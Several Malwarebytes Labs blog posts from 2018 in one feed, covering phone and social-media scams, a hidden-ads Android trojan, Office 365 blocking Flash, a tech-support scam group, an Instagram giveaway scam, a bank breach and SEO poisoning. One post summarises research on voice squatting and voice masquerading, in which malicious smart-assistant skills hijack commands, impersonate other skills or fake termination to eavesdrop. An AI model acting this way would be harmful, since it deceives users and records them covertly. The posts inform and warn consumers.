If you don’t know for sure, verify with other family members. Text the child’s parents while on the landline with her. Confirm that the family member is who she claims to be by asking personal questions only the relative would know. Scammers will try to fudge through details. Some might start crying. Again, the sense of urgency is pivotal in this scam.

Remember this: If your grandchild were truly in trouble and in jail, would you be the one person she would call? If that’s true, then you’d know if it were her on the other end of the line within seconds. If you’re not her go-to person, then it’s fair to ask more questions and to check in with other family members about the legitimacy of the call. You can even hang up and call back your grandchild on her cell. Chances are, she’ll pick up and have no idea who called you just now.

Caller ID is bunk

Nowadays, you can’t just trust that your caller ID will flag suspicious numbers. The responsibility of caller ID lies with the originating call. And if that caller is a scammer, then they know caller ID is trivial to spoof. Scammers have long since figured out how to spoof numbers so that it appears they’re coming from a familiar, local area code, as it greatly increases their chances at a successful scam. Both the Microsoft tech support call and the fake IRS calls use spoofed caller ID.

I demonstrated how easy spoofing was by using an app on my phone and making a call that appeared to originate from somewhere else. For a technical explanation of how caller ID spoofing works, check out this YouTube video.

  • Never allow anyone remote access to your computer.
  • Is there a pitch for a product/service/subscription? It’s probably a scam.
  • Is there a sense of urgency? IRS + “you will go to jail!” = scam!
  • Caller ID is bunk. Don’t trust it.
  • No legitimate institutions will want Apple iTunes cards or any other gift card as a payment form.

When it comes to using a land line, I don’t think there’s an ideal solution—one that guarantees 100 percent safety. However, armed with the right amount of knowledge, users can easily fend off scams—and stop being afraid of their phone.

Do you know someone who still has a landline? Have you had to explain scams to your relatives? Ever encounter any different scams than the one mentioned by phone? Please don’t hesitate to share your stories with us in the comments.

The post PSA: Users with landlines are more vulnerable to scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Social media: A treasure trove of spam and scams

Tue, 06/05/2018 - 17:00

There are two kinds of spam associated with social media. There are spam ads that actually live on social media, and there is spam that comes in your inbox, courtesy of social media. Both thrive by using data from your social media accounts. But how do spammers know how to target you and send you the mails that you are most likely to click on?

There is a real chance that you revealed that information yourself. To understand the relationship between the spam you get in your mailbox, your social media presence, and the ways that criminals try to scam users, you must first understand a few basic principles about how advertising works on social media.

Interest-based advertising

First of all, let’s differentiate between the spam we see on social media and the spam that we get in the mail, but has a relationship with what we interact with on social media. Spam that we see on social media is called interest-based advertising, which we have talked about before. It is also known as personalized or targeted advertising.

This is the foundation of what people perceive as “Facebook and Google knowing about every search I do and every article I read.” If you are interested in limiting the number of personalized ads you see on social media, Google offers an opt-out of interest-based Google ads in this article.

There are several different options for opting out of interest-based advertising. For example, if you do not want to see any advertisements on the sites you visit, you should look into installing an adblocker. Keep in mind that many sites can only stay in business because they are funded by advertising—that doesn’t mean they have the right to invade your privacy, though.

Logging off

If you are a Facebook user and wondering whether it pays off to log off after every session, according to Facebook, it does. Logging off should theoretically prevent social media sites from picking up on your browsing habits to serve you ads. But others have noticed that devices that come with Facebook installed transmit mysterious information in the background to Facebook’s servers—even when the user is not on Facebook. One thing is sure: as long as you have your Facebook timeline open in a browser and you are using the same browser to surf, Facebook will pick up on your interests.

The Facebook pixel

But that is not the only way companies utilize social media for targeted advertising. The Facebook pixel is another marketing tool. A pixel is a tiny object that can be placed on websites that use re-marketing based on which other sites their visitors have looked at. To the visitor these pixels are invisible, unless they have an anti-tracking tool installed.

If the visitor is considered interesting enough for the websites’ company, a targeted advertisement will be placed on the visitors’ Facebook page. This is why you will regularly see advertisements from companies whose website you have visited recently. For the webmaster, the pixel offers a lot more perks, but for the visitor it simply means more data mining is taking place.

Share, Like, Tweet, +1

Every site (including our own) that has buttons to share or promote an article on social media does send information about you to their respective owners (again, unless you are using an anti-tracking solution). Based on what articles you share, like, or otherwise engage with, social media networks can spot patterns and recognize your interests.

Spam based on social media data

While interest-based advertising is something we have learned to cope with, even though it may seem scary how much “they” know about us, it is far less dangerous than the spam you may receive based on your online behavior. Why? Let’s dive in.

Development of spam

While the huge, blanket spam campaigns that ensnare millions of email addresses still exist, todays threat actors are well aware of their diminishing effects. A targeted and well-constructed mail that looks like it comes from your bank offers a much bigger success rate then one coming from some random bank you have never done business with. And the same is true if the spam pretends to be from one of the online shops that you have given a thumbs-up to on social media.

A successful, targeted spam email trumps an annoying breach of trust that still delivers mostly legitimate ads. All it takes is one email to fake out an unsuspecting user into providing their own crucial information to criminals, who can then infect your computer, steal your data, or simply spy on you. But it’s got to be pretty difficult to get that information from users, right?

How do they know?

Providing spammers with the knowledge to scam you more effectively is probably not what you had in mind when you joined your social media network(s).

But of course, we never reveal sensitive, personal information on our social media accounts. Or do we?

If some scammer had the email associated with this Twitter account, they could pull off a real convincing scam attempt. And if you are the intended target, the threat actors will have the email addresses they need.

It is actually terrifying to know how the tiniest amount of information in the wrong hands can have a devastating impact on your life. Identity theft is a possible nightmare lurking around the corner. Once criminals have a starting point, they can use data from various breaches to gather more intel about their victims.

Recognizing spam: fake login requests vs. Nigerian Prince

There are two main categories of fraudulent spam: fake login requests and the Nigerian Prince variety.

The first category can be very convincing, especially if the emails seem to come from your actual bank. But if your bank sends out emails soliciting login credentials, I would advise switching to another bank (because they shouldn’t be doing that).

The emails themselves will have convincing logos and even appear to come from email addresses belonging to the bank or a credit card provider. And the websites they send you to are exact copies (content wise) of the real one, even including a green padlock that makes the site look legit.

Before you check any such mail, remember that your bank should never send you such an email in the first place. But if you look for these signs, you will see right through them. And the signs apply to many other cases like Netflix or iTunes scams. Ways to spot a targeted spam campaign include:

  • Comparing the domain in the email address to the one that your bank owns. You may spot (a small) discrepancy, such as slight spelling differences or random sub-domains.
  • Hovering over the links in the email. Do they lead to your bank’s actual site?
  • Checking the salutations. Does your bank address you with your first name or as “Dear customer”? Not likely. They will generally address you as Mr. or Ms. Last name.
Nigerian scams

These started out as ridiculous messages from a Nigerian prince who claimed, “We have a huge amount of money waiting for you here in a strange and far away country, and all we need from you is a little payment and some information to transfer it into your bank account.” Users duped by this scam would never see their original payment back, let alone the huge amount of cash promised to them. This type of scam has evolved to into many different stories and is nowadays also used to recruit money mules.

And, guess what? You don’t need a computer or email to get scammed either. It only takes a little bit of information, a good story, and a friendly victim to get scammed.

A real-world scenario

A woman gets a text from her brother telling her he has a new phone number, but now he can’t log in to his bank, and he needs to make an urgent payment. Can she do it for him? He’ll pay her back as soon as he has everything sorted. The message has her brother’s avatar and the story seems plausible. Not everyone will fall for this, but probably enough to make it worth trying. You don’t need to do much digging on someone’s Facebook profile to gather everything you need to spam and scam victims.

As much as it may pain you, don’t be that friendly person. In the last scenario, you should tell your brother to call you. That isn’t too much to ask if he needs your help that urgently, is it? And dump those scammy emails in the trash where they belong. Should you ever really be in doubt whether some email actually came from your bank, they won’t mind if you call them to verify that information. In fact, they will be glad that you were so cautious.

Now if only we could get everyone to be more cautious about what they share on social media.

Stay safe!

The post Social media: A treasure trove of spam and scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 28 – June 3)

Mon, 06/04/2018 - 16:51

Last week on Labs, we talked about the significance of SEO poisoning in the world of search marketing, blackmail attempts against financial institutions in Canada, voice command flaws in smart assistants, survey and potential phishing scams on Instagram, and the latest changes in Office 365.

We also shared our latest intel about America Geeks, a band of tech scammers that we profiled in 2015 and 2016.

Other news

Stay safe, everyone!

The post A week in security (May 28 – June 3) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: A race to hidden ads

Mon, 06/04/2018 - 15:00

Who doesn’t love a good motorcycle racing game, right? How about one easily available on Google Play, a “safe” place for all your Android app desires? How about a bike racing game that sticks with you so much, you can’t easily uninstall it? And it displays hidden ads?

Wait, what!? That’s right! In the slideshow below, a game titled Motorcycle Race—Bike Race (package name: com.bikeme.racersm) has rave reviews by users who demand to know how to uninstall the game.

Click to view slideshow. Rev your engines for heightened privileges

So how does one get into such a predicament? That all starts with the install process. Upon installing Motorcycle Race—Bike Race, the first screen asks to Activate device administrator.

Okay, so obviously a bike racing game requesting device administrator rights with permission to Lock the screen is a big red flag. However, if you didn’t catch that, there’s another clue that something is amiss. Look at the app name asking for permission: Media Player. That’s going to make finding the app in the device’s app list rather difficult (hint, hint).

After the initial weirdness of asking for heightened privileges, the app does open and run as advertised.

Click to view slideshow.

Don’t expect the game to perform well, though. It runs so slow and choppy, it makes for an unpleasant experience. This is because it’s doing something much more malicious in the background.

Over the handlebars into full screen ads

After the first time the device’s screen is locked/unlocked, it becomes clear why Lock the screen permission is requested. Behold: annoying lock screen ads that take up the whole screen!

Click to view slideshow. Time to chuck this bike: how to uninstall

At this point, any user would be ready to ditch this two-wheeled game. However, if the game was given device administrator rights, this isn’t as straightforward as simply dragging the icon to uninstall. The easiest method would be to let Malwarebytes for Android, which detects this as Android/Trojan.HiddenAds.BiRa, remove the app.

However, you can also uninstall the app manually. Let’s start with dragging the icon to uninstall. That’ll bring up this warning pop-up:

Make sure to note the “Bike Racer is part of the following app: Media Player” text, as you’ll need this information later. Click OK to land here.

Next, select Manage device administrators.

Click the check mark to uncheck Media Player (which is the true name of the bike racing app). Depending on the Android OS version, this could also be an on/off toggle switch.

Here’s an extra reminder, as this is the tricky part: Anytime you need to uninstall an app manually, you’re looking for the app name listed after the colon from first warning pop-up: part of the following app:<app name>. It’s easy to assume that it’s listed under the app icon name (in this case Bike Racer). This method is a clever way to obfuscate removal.

Back to uninstalling the app. After you select the check mark, you’ll get to this screen. Click “Deactivate” at the bottom of the screen.

After device administrator rights are revoked, once again drag the icon to uninstall. This time, you’ll be able to successfully remove the app.

You have the right to not give rights

Even when installing apps from reputable sources like Google Play, be careful when you grant device administrator rights. Although there are times when it’s appropriate to grant such rights to an app, make sure the rights line up with the functionality of the app. Giving device administrator rights to a respectable security app in order to remediate ransomware makes sense. A bike racing game needn’t be given the same rights. Why would they need to lock your screen?

With a little scrutiny and a lot of paying attention to the fine print, you can protect yourself from malicious apps that slip by Google Play’s security parameters. Stay safe out there!

The post Mobile Menace Monday: A race to hidden ads appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Blocks for Flash and others coming to Office 365

Fri, 06/01/2018 - 15:00

If you’re a user of Microsoft Office products such as Word and Excel, you’re probably aware that they’ve been used as inroads for malware for a long, long time. But what about malware attacks without Macros? Sure. Macro malware for Macs? That, too. Malicious documents and spying tools? Danger, Will Robinson.

We have some good news and some bad news.

The good news is that monthly subscribers of Office 365 are getting some new protection in the fight against bogus attachments and malicious files; the bad news is the changes don’t currently apply to standalone versions of Office.

What’s being changed?

Silverlight, Flash, and Shockwave are all getting the chop. If you used to run a malware campaign based around use of these controls, that won’t be the case for much longer. A combination of seeing these features used in rogue campaigns, generally low legitimate use by product users (when was the last time you embedded Shockwave?), and a rapidly approaching end of the line for both Flash and Silverlight means it made a lot of sense for Microsoft to bring the hammer down.

As the Microsoft blog notes, this alteration makes no difference in situations where the control is activated outside of Office—for example, placing a Flash video into some content using the insert online video feature. Still, this is better than what’s gone before. Hopefully, Microsoft will add more protection for people not using the specified version.

Speaking of which…

Help, I’m not using the correct version!

Microsoft has you covered even if you’re not a monthly subscriber of Office 365, though you’ll have to do a bit of the shovel work yourself to shore up your defences. Roll up your sleeves, set aside a bit of spare time, and delve into this help article, which provides step-by-step instructions to lock things down. Some caveats here:

  1. You’ll have to do a spot of registry editing.
  2. Editing the registry and getting it wrong can cause all sorts of problems. Ensure you’ve made a backup before touching it. Better safe than sorry!
What kind of danger are we talking?

Things like rogue embedded Flash aren’t just theoretical. It’s something we see a lot of. For example, here’s an exploit making use of rogue Excel documents targeting South Koreans via Flash.

Here’s the booby-trapped Excel sheet in action, complete with hidden ActiveX object highlighted in white:

Click to enlarge

From here, it pings one of several websites with a unique identifier, the Flash version on board, and the Operating System version. If the stars align, then it’s exploit time with a side slice of Remote Administration Tool to boot.

This is a pretty sophisticated attack, but there’s plenty more out there that are as basic as they come. Either way, they get the results they need to infect an organisation.

Sounds nasty. When does the block go live?

Microsoft has said that the block rolls into place for Office 365 monthly users next month, with people using the Semi-Annual Targeted Channel and the Semi-Annual Channel receiving theirs in September 2018 and January 2019, respectively.

Of course, you can roll the blocks back yourself if you really want to (is that going to be a thing?) by following these instructions. Warning: once again, this involves some registry editing, so please make sure you’re comfortable before altering anything. Of course, if you have a monthly 365 package, it’s quite possible you’ll have an IT team performing said edits for your organisation anyway.

What else can we do to lock down Office files?

Quite a few things, actually. In more general attacks, scammers will try and convince potential victims to give Windows Admin permissions to rogue files; when that happens, it’s infection time. By the same token, they’ll try everything to convince someone to click through a bunch of “Enable Macro” prompts in an Office file. If you don’t need Macros, you should consider disabling them as soon as possible.

You can also apply a little elbow grease, and think long and hard before opening up an attachment sent your way. If you want to play it safe, always check with the sender before opening up a Word or Excel document. Don’t just stop at email confirmation; if the account has been compromised, then of course you’re going to receive a reply that says, “The attachment is definitely safe, honest.” Pick up the phone if need be. A little caution never hurt anyone, right?

For now, familiarise yourself with the upcoming changes, and have a think about whether or not you still need some of the controls penciled in for blocking. We’ll be keeping an eye out for the response to the changes, as demand for applying similar controls for other versions of Office is likely to be high. Fingers crossed, Microsoft will take heed and widen the rollout.

The post Blocks for Flash and others coming to Office 365 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A conversation with America Geeks

Thu, 05/31/2018 - 16:00

Thanks to NeeP for contributing significant research. You can check out NeeP’s YouTube channel here.

Malwarebytes has written quite a bit about tech support scammers, typically focusing on new scam techniques as they arise with new threat actor groups. But sometimes our research discovers scammers who persist with the same techniques, the same pitches, and the same IP abuse, no matter how many times we catch them.

We first published on America Geeks (then known as Geeks Technical Support) in 2015, noting their attempts to use Malwarebytes’ intellectual property to pose as us and defraud their customers. After a series of takedowns and abuse complaints, we revisited America Geeks in 2016—still using Malwarebytes image assets, still scamming.

And lastly, in March, Malwarebytes Labs researchers found them again using Malwarebytes to sell their scam, this time targeting French users. We were content to continue publishing on America Geeks indefinitely, but then they decided to open a ticket with the Malwarebytes help desk.

In further social media comments that have since been deleted, this person identified as being associated with America Geeks, and was quite concerned about our 2016 post on the company. We did not follow up.

On May 1, our customer support team got a phone call from “Kevin Nash” at the “Better Business Bureau” who informed us that America Geeks was no more, and our 2016 blog post was causing problems for someone who had bought their infrastructure. (At the time, their website was still up and not at all defunct.)

Why the Better Business Bureau would serve as an intermediary between a defunct business’ CEO in one country and a tech company in another was left unexplained. Why “Kevin Nash” had an Indian cell phone number and a heavy Indian accent was left unexplained. We did not follow up.

He provided contact details that we have redacted.

“Kevin Nash” then contacted us as the personal attorney of the former America Geeks CEO. He alleged that Kunal Bansal of America Geeks was at risk of physical harm from our 2016 blog post, and needed us to take it down. Further, America Geeks was shut down, and therefore no longer a threat to anyone. Given the seriousness of the claims, we followed up. Here’s the transcript for three calls conducted with Kevin Nash:

Call one

America Geeks (AG): Hey, this is Kevin. How you doing buddy?

Malwarebytes (MWB): Oh, is this Kevin…Kevin Nash?

AG: Kevin Nash.

MWB: Okay, I’m sorry. Are you calling—are you from the Better Business bureau? Cause I think thats what the message I had gotten said.

AG: Uh…no…no no. I’m not from Better Business Bureau, I’m with the legal team with the company that the review is about.

MWB: You’re with the legal team? What company is it? Geek? Geeks? Is it…

AG: Yeah. Okay, so the thing is, that Geeks company is closed. Alright?

MWB: Okay.

AG: That geek company is closed. That business doesn’t exist anymore, and no business associated with that article that is, uh, open. Like we have closed that business. My…self called BBB because my friend works there. It could be that he called because I interested him to. And that probably…

MWB: Okay. Who am I speaking with? Is this Kevin Nash?

AG: Yeah, that’s right. My client owns this company, and uh…that company doesn’t exist anymore. So, uh…his personal information is there on that post. And uh, he got critically attacked by someone as well, due to the, you know, the information there on the post. People got to know about him, knows his business, everything related to that business, now he is, uh, concerned regarding his privacy, you know?

MWB: And What is your client’s name?

AG: Kunal Bansal.

MWB: Okay, um, I’m a little confused. If the company is closed, then what—were you planning on reopening the company? Is that why you want to get rid of the post?

AG: No. The problems of getting that post removed is that his personal details are mentioned on that post. Even the photo is there on the post.

MWB: Okay, I’ll tell you what. If you can send me, send me all the information in the email, and what it is you want us to do, I’ll see what I can do for you. Do you have a phone that doesn’t go to voicemail? You’re a lawyer? And in what state are you practicing?

AG: I’m in California. Marina Del Ray?

MWB: Can you send me the information of your law firm? And um, all the information of the client, and I’ll get back to you as soon as I get that information.

AG: Thank you so much.

MWB: Thank you.

Call two

AG: [Inaudible] This is Kevin Nash.

MWB: Hey yeah, I can hear you. You’re the lawyer for Mr. Bansal?

AG: Kunal Bansal. Yeah, that’s right.

MWB: Okay, what’s the name of your law firm again?

AG: USA Legal Services


AG: It’s USA Legal Services

MWB: Okay and you’re out of, uh, California?

AG: Yep.

MWB: Do you have an address there in California?

AG: That would be [REDACTED]

MWB: Do you have an office number?

AG: Yes, I have office number, and this is my office number.

MWB: Your office number is the 323?

AG: Yeah thats my personal, direct line in office.

MWB: Has [Kunal Bansal] made any restitution? On the people that he scammed?

[America Geeks hangs up.]

Call three

AG: Yeah, I’m so sorry, I don’t, the line got blank.

MWB: Well, that’s okay. Okay, so was there any restitution made on behalf of your client?

AG: Well, uh, I’ll need to check once with the department there, and I’ll get back to you, certainly. And I’ll have something emailed to you, within minutes. Alright? [NOTE: Mr. Nash never provided any evidence of institution, or explanation of who he was checking with if the company was shut down.]

MWB: Okay. Uh, one other question. Okay, so the address you gave me, [REDACTED]. I can’t find a USA Legal Services at that address. Is that the correct address?AG: That should be [REDACTED SECOND ADDRESS]

MWB: Oh now it’s [REDACTED]?

AG: Talking to me like I’m some criminal or something…

MWB: Listen—I deal with complaints and I’m trying to clarify who you are. I mean, I get a phone call. First of all, the phone call stated that you are Kevin Nash from Better Business Bureau. Now when I call you back you’re Kevin Nash. . .and you’re the lawyer, and then you’re giving me the address for a law firm that doesn’t exist.

AG: [Silence.]

MWB: So yes, I have some reservations that I’m not dealing with a legitimate person. Your emails are coming from a different person altogether. They’re not coming from a law office. They’re coming from “Naresh Kumar.”

AG: I got you, I got you. I have a, let me, let me send you an email.

MWB: Can you explain to me why that I’m getting emails from Naresh Kumar, and you’re saying you’re Kevin Nash?  And you’re a lawyer?

AG: [pause] That’s right. He’s the person who’s dealing with me through Mr. Kunal Bansal. And the reason why you’re not getting any email from my address is because I was having him do that. Now I do have access to my email and if you’ll give me like two minutes, then…restitution is what you’re asking for? I’ll send it to you through my official email wherein I will have my company phone number, as well as my number, as well as company [inaudible]

MWB: What’s your company phone number?

AG: That will be 844-676-LOAN. L-O-A-N. [NOTE: Searches on this number returned hits for mortgage loans and student debt consolidation. We did not redact the number because we believe it to be associated with multiple fraudulent businesses. All websites with this number are now down.]


AG: There’s an alternate too, it’s [REDACTED.]  Law.

MWB: Okay, well, if you can send me the information, Mr. Nash?

AG: I’ll send it to you from a [inaudible] email address this time, alright?

MWB: Okay. Alright, I’ll be waiting for your email address.

Digging into America Geeks ops

After speaking with Mr. Nash, we decided to take a look at how extensive America Geeks operations really were. First and foremost, he provided an Indian cell phone number that popped in Google Cache as a corporate contact on the site https://shopping4kart[.]com.

Passive DNS for that site revealed extensive likely tech support scams.

A survey of historical victim reports using overlapping phone numbers revealed the following business names:

  • America Geeks
  • Geeks Technical Support
  • Mark Software Private Limited, USA
  • Technology LLC
  • Blue Alpha
  • IT Pvt Ltd
  • USA Legal Services LLC

Independent researchers provided us with the following list of phone numbers used by the threat actor group:

  • 18776589988
  • 18776941838
  • 18882466988
  • 18883502808
  • 18884273330
  • 18884898307
  • 18885882055
  • 18886100490
  • 18886608571
  • 18887590763
  • 18887789143
  • 18887799348
  • 18889127011
  • 18889597430
  • 18776941838
  • 18558870097
  • 18446709167
  • 18886100490
  • 18445714235
  • 18887549063
  • 18889597430
  • 18887789193
  • 18552174635
  • 18882955166
  • 18882954668

[NOTE: Numbers are provided for historical purposes only. Scammers change numbers frequently.]

The America Geeks website was in fact down at the time of Mr. Nash’s phone call. But scammers frequently maintain extensive domain holdings to better shift operations when one domain receives too much attention. America Geeks make frequent use of browser lock screens, but also have a fair number of fake corporate sites to attract natural traffic. The domains used over their lifespan include, but are not limited to:


[NOTE: A number of these domains are historical, and may be down or transferred to a legitimate owner since publication.]

Concluding a review of their historical infrastructure, we found tech support scam complaints relating to Kunal Bansal–related properties dating back to 2012. Although America Geeks’ website is down at the time of writing, we find it unlikely that their scamming has ceased entirely. Instead, it has most likely shifted to a new company name. Given that they had resources sufficient to target users in multiple countries, in their own language, America Geeks appears to have been extremely profitable, and we advise users to be wary of any new company name used by the America Geeks proprietors.

For more on tech support scams and how to stay safe, see the following blog, or check out our forums to report new scam sites and numbers.

The post A conversation with America Geeks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Instagram story spam claims free Apple Watch

Thu, 05/31/2018 - 15:00

I have to admit, I’m not 100 percent sure who Elton Castee is. “Who’s that?” you ask? Digging around revealed that he’s big on YouTube, has done some films, and raises money for dogs, which is very cool. He’s also popular on Instagram, with 400k+ followers. With that in mind, we’ve seen a few reports of his account being compromised (and by “few”, I mean “absolutely loads”), and decided to check it out.

Click to enlarge

A phony phone giveaway

Visiting on the web while not logged in reveals the most recent post looks a little different from the other selfies:

Click to enlarge

A single white text on black background, which reads as follows:

Wassup guys! I am giving away 100 free iPhone X’s and Apple watches on my IG Story! Claim them before it’s too late. Love you guys (emoji heart thing)

Visiting the Instagram app while logged in immediately takes you to an Instagram Story. If you’re not familiar with an Instagram story, it’s a rotating set of images/video that you swipe through one after the other.

Click to enlarge

Click to enlarge

Swiping up on any of the images redirects you to the below Apple Watch giveaway website, located at:


Click to enlarge

Please choose which Apple watch you would like to receive 

Once you’ve selected your preferred watch (in this case, some sort of neon yellow thing with a sport band), you’re asked to click “Confirm” and move to the next stage.

Click to enlarge

We’re now faced with a series of text boxes so the personal information data input games can begin.

Click to enlarge

Full name, email, street, city, zip code, and country are all requested on this page. Take note of the very specific wording:

Thank you for completing the offer. We now require your address in order for us to send you the item.

There’s nothing ambiguous there, right? Give address, receive item. And yet…

Click to enlarge

Wait, “locating?” I thought you already had my watch? Why are we trying to locate one? I already gave you all that juicy personal information! What happens if there’s no stock?

Click to enlarge

Oh, phew, it’s available. But…now I have to confirm I’m a human and not a bot, so they can “prevent spam,” because apparently bots have a thing for filling in their personal information and having neon sports watches delivered to their home addresses. If I know my Internet antics, this is surely going to end with a pile of surveys to choose from:

Click to enlarge

Hooray, a pile of surveys to choose from!

In practical terms, what this means is you’ve already handed over a bunch of personal information to goodness knows who, and now you’re being asked to do the exact same thing for a third-party entity of your choice. Quizzical eyebrows were raised at the text, which states:

This page will unlock and ask for your shipping address

Because I’m almost certain we already did that a few pages back.

I suppose you could pick the iPhone X competition and complement the watch, which is surely going to arrive at some point, but from experience, we’d advise you to steer well clear of too-good-to-be-true freebie offers such as these.

Instagram lockdown

There are, of course, things you can do to help keep your Instagram account safe from harm. It’s possible there are additional security measures in place for a verified account, and we don’t know what’s happened in this case to allow spam to be posted, but some general tips for protecting your Instagram are always a good thing.

A strong, unique password, a password manager (if that’s your thing), a locked down email account tied to your Instagram, logging out if at a public terminal (or your own device, if you want to be super sure), and enabling two factor authentication are all great things to set in motion.

Any social media account doing big numbers is always a prime draw for scammers—from Myspace to Facebook and Tumblr to Twitter, swiping just one big name can result in spam, clicks, and even possibly malware galore for the fanbase. Hopefully Elton will regain access to his account shortly, but for now, try to avoid winding up in a similar situation to Elton, Alicia Keys, or anyone else struck down by a bout of spammy antics. Your followers will thank you for it.

The post Instagram story spam claims free Apple Watch appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Researchers discover vulnerabilities in smart assistants’ voice commands

Wed, 05/30/2018 - 16:59

Virtual personal assistants (VPA), also known as smart assistants like Amazon’s Alexa and Google’s Assistant, are in the spotlight for vulnerabilities to attack. Take, for example, that incident about an Oregon couple’s Echo smart speaker inadvertently recording their conversation and sending it to a random contact. Or that time when the Alexa started laughing out of the blue. Indeed, something has to be done about these hacks, whether they’re by accident or not.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers can do what they’re created to do with the use of apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action provides a VPA additional features. Users can interact with a smart assistant via a virtual user interface (VUI), allowing them to run a skill or action using their voice.

Entrepreneurs, with the help of developers, are already taking advantage of creating their own voice assistant (VA) apps to cater to client needs, making their services accessible in the voice platform, or merely introducing an enjoyable experience to users.

As of this writing, the smart assistant apps market is booming. Alexa skills alone already has tens of thousands, thanks to the Alexa Skill Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, making skills creation easy for the person who has little to no knowledge of coding.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor takes advantage or abuses the way a skill or action is invoked. Let’s take an example used from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can potentially create a malicious app with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon is now rewarding kids for saying “please” when commanding Alexa, a similar hijacking can occur if a threat actor uses a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice to say, VPAs are not great at handling homophones.

Read: Out of character: Homograph attacks explained

Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses volunteer skill termination, a feature wherein skills can self-terminate after delivering a voice response such as “Goodbye!” to users. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting from attack.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Two major Canadian banks blackmailed after alleged data breach

Tue, 05/29/2018 - 19:52

While the US was celebrating Memorial Day on Monday, Canada was dealing with an unusual data breach affecting two popular financial institutions: Simplii Financial and Bank of Montreal (BMO).

The CBC broke the story and updated it throughout the day to mention that some 90,000 customers were possibly affected by this attack which the banks say they became aware of on Sunday, just one day prior.

While at first the details were scarce, the CBC later confirmed that the perpetrators had threatened to release their data trove publicly unless the banks agreed to pay them a 1 million dollar ransom on May 28th, just before midnight.

BMO has said that they did not pay the ransom and instead is focusing on helping and protecting its customers. Both banks are offering support and in particular credit monitoring services to the victims of this incident.

This hack is noteworthy for targeting two major Canadian financial institutions at the same time and exposing extremely sensitive personal information which, unlike a password, cannot be changed. Although the data has now lost some of its immediate value, the attackers may decide to dump all the information publicly or sell it to the highest bidder.

Breaches leave users scared and frustrated because people know their data may end up being stolen in a way that is out of their own control. Having said that, certain measures can contain the damage and can be readily applied. For one, using strong and unique passwords is absolutely critical so that hackers cannot easily compromise your other accounts.

Many online services have security questions as part of the authentication process that are problematic in themselves. Rather than answering ‘blue’ to the question about your favourite colour, be a little more creative and come up with a full sentence, or even something that has nothing to do with colours at all. Finally, whenever possible, you should enable two-factor authentication as it provides an additional layer of security to the otherwise weak password-only approach.

The post Two major Canadian banks blackmailed after alleged data breach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

SEO poisoning: Is it worth it?

Tue, 05/29/2018 - 19:12

Search Engine Optimization (SEO) poisoning basically comes down to getting your web page high in the rankings for relevant search results without buying advertisements or using legitimate, but tedious, SEO best practices. Instead, threat actors use illegal means to push their page to the top. Sometimes, this technique is also referred to as black hat SEO. (Although the people selling these services will refer to them as “link building services.”)

So how does SEO poisoning work? And is it something site owners should actually try? Or should they avoid it at all costs?

The basics

SEO is short for Search Engine Optimization and it is a marketing strategy that is designed to make sure that your website is found if people search for certain keywords that are relevant to your business. The ranking of a site in Google’s search results is primarily based on how well the page is optimized, but it’s also based on “reputation.” The reputation of a page is calculated using the number of inbound links pointing to that page. It helps a lot if the incoming links come from pages that are about the same or related subjects, but a large amount of links coming from all kinds of sites helps as well.

Why focus on Google?

In this article, we will focus on how SEO works for Google. This is for a few reasons:

  • Google is by far the most popular search engine, despite mighty efforts by their competitors. The fact that “Googling” is a verb in many languages should tell you enough.
  • Google is relatively open about how its algorithms work, and you can find a lot of information if you want to improve the ranking of your search results, which is what SEO is all about. For good results, it’s imperative that web developers keep an eye on new updates and how these updates might influence their SEO strategy.
  • Google is the industry standard in this field, and because of this many available SEO tools are limited to or aiming for Google results.
How does link building work?

